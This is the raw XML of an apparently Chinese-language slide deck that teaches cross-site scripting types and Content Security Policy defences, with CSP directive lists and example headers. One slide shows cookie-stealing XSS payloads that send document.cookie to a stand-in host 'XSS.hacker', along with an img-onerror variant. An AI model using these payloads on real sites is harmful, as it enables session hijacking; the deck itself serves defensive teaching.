          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1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Cross-site scripting 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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击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zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>基于DOM的XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0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zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击案例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000" dirty="0"/>
              <a:t>&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;script&gt;location.href='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS.hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/steal?cookie='+document.cookie;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://web.site/index.php?userid=%3Cscript%3Elocation.href%3D%27http%3A%2F%2FXSS.hacker%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="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000" dirty="0"/>
              <a:t>http://web.site/index.php?userid=&lt;img src=1 onerror=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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Content Security Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内容安全策略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dirty="0"/>
              <a:t>工作原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>资源加载限制选项、URL 限制选项、其他限制选项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>default-src 'self'; img-src https://*; child-src 'none';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>浏览器默认使用同源策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>行为报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/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资源加载限选项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490345"/>
            <a:ext cx="10515600" cy="5092700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"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dirty="0"/>
              <a:t>script-src：外部脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>style-src：样式表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>img-src：图像</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>media-src：媒体文件（音频和视频）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>font-src：字体文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>object-src：插件（比如 Flash）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>child-src：框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>frame-ancestors：嵌入的外部资源（比如&lt;frame&gt;、&lt;iframe&gt;、&lt;embed&gt;和&lt;applet&gt;）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>connect-src：HTTP 连接（通过 XHR、WebSockets、EventSource等）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>worker-src：worker脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>manifest-src：manifest 文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/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资源限制选项值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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机名：example.org，https://example.com:443</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径名：example.org/resources/js/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通配符：*.example.org，*://*.example.com:*（表示任意协议、任意子域名、任意端口）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议名：https:、data:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关键字'self'：当前域名，需要加引号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关键字'none'：禁止加载任何外部资源，需要加引号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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000"/>
              <a:t>Content-Security-Policy: script-src 'self' https://apis.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>unsafe-inline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/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资源限制案例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zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>需求一：页面只能加载页面相同域名的脚本资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="20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zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>需求二：禁止任何页面内联脚本的运行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="资源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355" y="2020570"/>
            <a:ext cx="8542655" cy="3961765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="资源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1170" y="2020570"/>
            <a:ext cx="4914265" cy="4466590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="资源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4355" y="2020570"/>
            <a:ext cx="8323580" cy="3961765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="资源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6165" y="2205990"/>
            <a:ext cx="10058400" cy="359156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Q&amp;A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dirty="0"/>
              <a:t>相关资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>http://www.ruanyifeng.com/blog/2016/09/csp.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>https://www.w3.org/TR/CSP/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>谢谢大家</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0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0772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l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5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l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5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TYPE" val="l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="22"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="3"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="17"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_f*1_2_1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l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="22"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="3"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="17"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_f*1_1_1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TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_5_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_i*1_5_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5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UNIT_TYPE" val="l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_5_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="22"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="3"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="17"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_f*1_5_1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TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="5"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="a_l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1_1"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="contents"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_COMBINE_RELATE_SLIDE_ID" val="diagram20170795_5"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_10"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="10"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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0772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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
